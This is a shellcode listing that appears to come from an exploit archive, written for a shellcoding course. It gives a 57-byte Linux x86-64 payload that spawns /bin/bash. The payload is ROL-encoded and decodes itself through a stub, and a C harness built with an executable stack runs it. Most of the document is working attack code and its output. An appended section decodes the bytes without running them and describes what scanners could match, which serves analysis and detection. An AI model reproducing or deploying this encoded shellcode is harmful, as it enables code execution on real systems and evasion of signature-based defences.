
Linux/x64_86 ROL Encoded Execve Shellcode
Posted Apr 24, 2020
Authored by Bobby Cooke

A 57-byte Linux/x64_86 /bin/bash shellcode. The stub decodes the ROL-encoded shellcode. When the stub has finished decoding the payload, execution control is passed to the payload.

tags | shellcode, bash
systems | linux
SHA-256 | 0b2a9ee02c0b7d0258cad51519bebf538bc5adf11a6b79a09c2f9a31449092a7

// Shellcode Title:  Linux/x64 - ROL Encoded Execve Shellcode (57 bytes)
// Shellcode Author: Bobby Cooke
// Date: 2020-04-24
// Tested On: Kali Linux 5.3.0-kali3-amd64 x86_64
// Description: Encoded Execve /bin/bash shellcode for Linux x64_86 systems. The stub decodes the ROL Encoded shellcode. When the stub has finished decoding the payload, execution control is passed to the payload.
// SLAE/Student ID: PA-10913
// Course: This shellcode was created for the x86_64 Assembly Language and Shellcoding on Linux (SLAE64) Course offered at pentesteracademy.com.
// Shoutout: skape, vivek, offsec, corelan
// Usage:
// root# gcc -m64 -z execstack -fno-stack-protector shellcode.c -o shellcode
// root# echo $$ | xargs ps
// PID TTY STAT TIME COMMAND
// 3067 pts/3 Ss 0:00 /bin/bash
// root# ./shellcode
// Shellcode Length: 57
// root# echo $$ | xargs ps
// PID TTY STAT TIME COMMAND
// 3501 pts/3 S 0:00 [bash]

#include<stdio.h>
#include<string.h>

unsigned char shellcode[] = \
"\xeb\x0d" // jmp short call_decoder
// decoder:
"\x5e" // pop rsi = &String
// decode:
"\xd0\x0e" // ror byte [rsi], 1
"\x80\x3e\x55" // cmp byte [rsi], 0x55 - last byte? ror 0xaa, 1 = 0x55
"\x74\x0a" // je Shellcode - End? Jump to shellcode!
"\x48\xff\xc6" // inc rsi - Not end? move 2 next byte
"\xeb\xf4" // jmp short decode - loop 2 decode next byte
// call_decoder:
"\xe8\xee\xff\xff\xff" // call decoder // go 2 decode loop
// Execve(/bin/bash) ROL Encoded Shellcode
"\x90\x62\xed\x90\xef\xcd\x90\x62\xff\xae\x90\x07\x85"
"\xd0\xa4\x90\x75\x5e\xc4\xd2\xdc\x5e\xc4\xc2\xe6\xa4"
"\x90\x62\xa5\x90\x13\xcf\x61\x76\x1e\x0a\xaa";

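int main()
{
    // strlen() takes a char * and returns size_t, so cast and print with %zu
    printf("Shellcode Length: %zu\n", strlen((const char *)shellcode));
    // Call the byte array as a function; the stub decodes the payload in place
    int (*ret)() = (int(*)())shellcode;
    ret();
    return 0;
}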
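
To inspect the payload without executing anything, the stub's decode loop (ror each byte by 1, stop when a byte decodes to 0x55) can be reproduced on a plain buffer. This is an added example, not part of the original listing; the names `rol_decode`, `ror8`, `ENCODED` and `END_MARKER` are assumptions of this example.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Encoded payload bytes copied from the listing above (decoder stub excluded). */
static const uint8_t ENCODED[] = {
    0x90,0x62,0xed,0x90,0xef,0xcd,0x90,0x62,0xff,0xae,0x90,0x07,0x85,
    0xd0,0xa4,0x90,0x75,0x5e,0xc4,0xd2,0xdc,0x5e,0xc4,0xc2,0xe6,0xa4,
    0x90,0x62,0xa5,0x90,0x13,0xcf,0x61,0x76,0x1e,0x0a,0xaa
};

#define END_MARKER 0x55 /* value the stub compares against after each ROR */

/* Rotate an 8-bit value right by one bit, as `ror byte [rsi], 1` does. */
static uint8_t ror8(uint8_t b) { return (uint8_t)((b >> 1) | (b << 7)); }

/*
 * Mirror the stub's loop on a buffer: rotate each byte and stop at the first
 * byte that decodes to END_MARKER. Returns the payload length (marker
 * excluded), or -1 if no marker appears within n bytes. The real stub has no
 * such bound and would keep rotating memory past the buffer.
 */
long rol_decode(const uint8_t *enc, size_t n, uint8_t *out)
{
    for (size_t i = 0; i < n; i++) {
        uint8_t d = ror8(enc[i]);
        if (d == END_MARKER)
            return (long)i;
        out[i] = d;
    }
    return -1;
}

int main(void)
{
    uint8_t out[sizeof ENCODED];
    long n = rol_decode(ENCODED, sizeof ENCODED, out);
    if (n < 0) {
        fprintf(stderr, "no end marker found\n");
        return 1;
    }
    printf("decoded %ld bytes:\n", n);
    for (long i = 0; i < n; i++)
        printf("%02x%c", out[i], (i % 16 == 15 || i == n - 1) ? '\n' : ' ');
    return 0;
}
```

The decoded bytes contain the string `/bin/bas` and end in `0f 05` (`syscall`) preceded by `b0 3b` (`mov al, 0x3b`, the execve syscall number), which is what a static scanner can match once the one-bit rotation is undone.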